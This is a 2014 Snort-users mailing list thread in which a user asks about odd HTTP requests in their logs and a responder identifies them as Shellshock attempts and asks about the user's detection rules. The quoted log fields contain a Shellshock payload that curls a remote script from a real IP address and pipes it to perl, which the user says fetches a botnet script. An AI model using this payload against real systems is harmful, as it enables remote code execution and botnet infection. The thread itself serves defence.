[Snort-users] Odd http requests in the logs

waldo kitty wkitty42 at ...14940...
Mon Nov 3 14:15:21 EST 2014


On 11/2/2014 11:23 PM, Richard Geddes wrote:
> Hello,
>
> I received a few (9) events in my web logs with the following fields:
>
> agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png |
> perl"
>
> referrer : "() { :; }; curl
> http://202.28.77.53/~prajaks/310482/index.png | perl"

these are shellshock attempts... they are trying to use a macro hole in the bash 
command interpreter...

> downloaded index.png, and it turns out to be a base64 encoded perl
> script that has comments about a botnet.  It seems to target apache.

yes, that script is a "2nd phase" that's only operational if the shellshock 
bypass attempts works... it also requires curl and perl to be installed and 
operational... curl for the retrieval and perl for the botnet script execution...

> I'm using snort with snort VRT Rules on a pfsense firewall, and pfsense,
> snort, and the snort rules are up-to-date

do you have the shellshock detection rules enabled?

> snort seems to be passing these requests on to my web server, and it
> seems to me they should be blocked.

does the pfsense installation of snort operate as IDS (intrusion detection 
system) or IPS (intrusion protection system)?

in either case, if the rules are not enabled to detect this problem, snort won't 
react to traffic that matches...

> I don't know enough about how web servers and log handlers process this
> data to determine if it's a threat.

the way it works is if those fields are processed by a bash CLI session... they 
create a macro that bash doesn't properly handle and it executes the commands 
after the semi-colon ";"... that's the bug... bash should stop processing the 
macro when it sees the semi-colon... if you are running a *nix OS, you should 
have already gotten several security updates fixing this problem...

> Is there a way to tell snort to block http requests with these fields?
> The source of the malicious file should probably be regex'd  in case
> there are alternate sources of this file.

blocking depends on your installation and its capabilities...

-- 
  NOTE: No off-list assistance is given without prior approval.
        Please *keep mailing list traffic on the list* unless
        private contact is specifically requested and granted.




More information about the Snort-users mailing list